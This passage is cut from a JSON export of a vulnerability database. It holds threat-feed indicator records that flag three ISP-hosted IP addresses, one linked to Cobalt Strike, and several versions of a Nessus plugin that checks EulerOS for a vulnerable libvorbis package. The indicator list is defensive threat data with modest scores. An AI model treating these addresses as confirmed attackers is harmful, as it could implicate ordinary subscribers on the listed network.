"iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "1c4c67613413b2b46f0c996ec6dcbf5c"}, {"key": "modified", "hash": "343dfd1fd1f3266eb93ba802eb770f1b"}, {"key": "published", "hash": "1c8f2cd39feb63f9493fa1ae5f67c6a6"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "13dea883b752e2629bfcc86e61e3a06c"}, {"key": "threat", "hash": "b0fd79c1c72dc7e63729a01258eaf3cd"}, {"key": "title", "hash": "06ab39477a58d5c0d844915c98bb0e62"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "b6e559432cecc15e86d79930647b3a411b6cc0a391c113192f2fb0150f5a4716", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["209.159.207.46"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 67.58, "ioc_tags": 0.89, "ioc_total": 60.0}, "tags": ["malware"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Rapid City", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 829, "firstip": {"netv4": "209.159.192.0", "num": "3516907520"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.215.255", "num": "3516913663"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": ["cobalt_strike"]}, {"id": "RST:063FFDD1-F353-32DD-A87F-7943FB04FF78", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 216.254.235.67", "description": "Found **216[.]254.235.67** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-02-04T03:00:00, Last seen: 2021-02-04T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 216.254.224.0, Last IP 216.254.255.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 880 domains.\nGEO IP information: City \"Marshall\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-02-04T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-02-04T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "23f0a5a73f90fc45292b1df9904d3974"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "06896ef897411c1f988842884639a680"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "a1d581d9ab40f552453249210a0e06b8"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "3506b85ae1cd9167ae5319c21becbcc5"}, {"key": "modified", "hash": "0e31fed3acb7b6a280861146cd1b7fd7"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ab139942bf7f4d480a6873fe81fe5c8b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "de9f944f0d78f6b6318504b715c898d3d5f4807d36f01a18cb26fd9325b04987", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["216.254.235.67"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Marshall", "country": "United States", "region": "Minnesota"}, "asn": {"cloud": "", "domains": 880, "firstip": {"netv4": "216.254.224.0", "num": "3640582144"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "216.254.255.255", "num": "3640590335"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:35B45437-3403-3108-B895-5DB009B1A8F8", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 216.254.238.15", "description": "Found **216[.]254.238.15** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **41**.\n First seen: 2021-02-13T03:00:00, Last seen: 2021-02-22T03:00:00.\n IOC tags: **shellprobe**.\nASN 20412: (First IP 216.254.224.0, Last IP 216.254.255.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 859 domains.\nGEO IP information: City \"Watertown\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-02-23T00:00:00", "modified": "2021-02-13T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-02-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f0444edfa0832a0f242ded6df6a1324d"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "086e137ce79a6318275da784a004fcf3"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "f3f0548ab67080240842c297b4ce0746"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "7380e09c43b1defbedd3bd3a74631742"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "d1b7d22938da6df21ff33ca4afc6b89e"}, {"key": "modified", "hash": "313c459a8e12b1880da4ad165ae95dcf"}, {"key": "published", "hash": "a5df47cc3b26c68cffcf0d96937954b5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "2b33303dc2f9e88c479e375f036b1fca"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "6452607b84489c320bccf621d43bfb54f7981fee6588a1d815a1b815fa2f2ecb", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["216.254.238.15"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.85, "ioc_src": 64.59, "ioc_tags": 0.75, "ioc_total": 41.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Watertown", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 859, "firstip": {"netv4": "216.254.224.0", "num": "3640582144"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "216.254.255.255", "num": "3640590335"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}], "nessus": [{"id": "EULEROS_SA-2021-1440.NASL", "hash": "14e516561d292e8c38c3217d68ee9ab8", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)", "description": "According to the version of the libvorbis package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2021-03-10T00:00:00", "modified": "2021-03-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147449", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?27b9d79c", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20412"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-08-19T12:05:36", "history": [{"bulletin": {"id": "EULEROS_SA-2021-1440.NASL", "hash": "7704e39097d1e738c268d759c6ffb15c08352a43f24bb57a3e489ea784557335", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)", "description": "According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147449", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?27b9d79c"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-03-11T09:09:26", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2021-03-11T09:09:26", "references": [{"idList": ["EULEROS_SA-2021-1493.NASL"], "type": "nessus"}, {"idList": ["CVE-2020-20412"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-03-11T09:09:26", "rev": 2, "value": 4.8, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147449);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b9d79c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.2.6"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-11T09:09:26", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "EULEROS_SA-2021-1440.NASL", "hash": "8af53de31907ad022e44bd1610caef6a42eb887f24b0d272fa0155edead73b65", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)", "description": "According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147449", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?27b9d79c"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-03-17T01:08:51", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2021-03-17T01:08:51", "references": [{"idList": ["EULEROS_SA-2021-1493.NASL"], "type": "nessus"}, {"idList": ["CVE-2020-20412"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-03-17T01:08:51", "rev": 2, "value": 5.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147449);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b9d79c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.2.6"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-17T01:08:51", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "EULEROS_SA-2021-1440.NASL", "hash": "f3d3609914532e22499e83381fd5e025", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)", "description": "According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/147449", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?27b9d79c"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-07-28T22:16:47", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1493.NASL"]}], "modified": "2021-07-28T22:16:47", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-07-28T22:16:47", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147449);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b9d79c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.2.6"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-28T22:16:47", "differentElements": ["cpe", "cvss2", 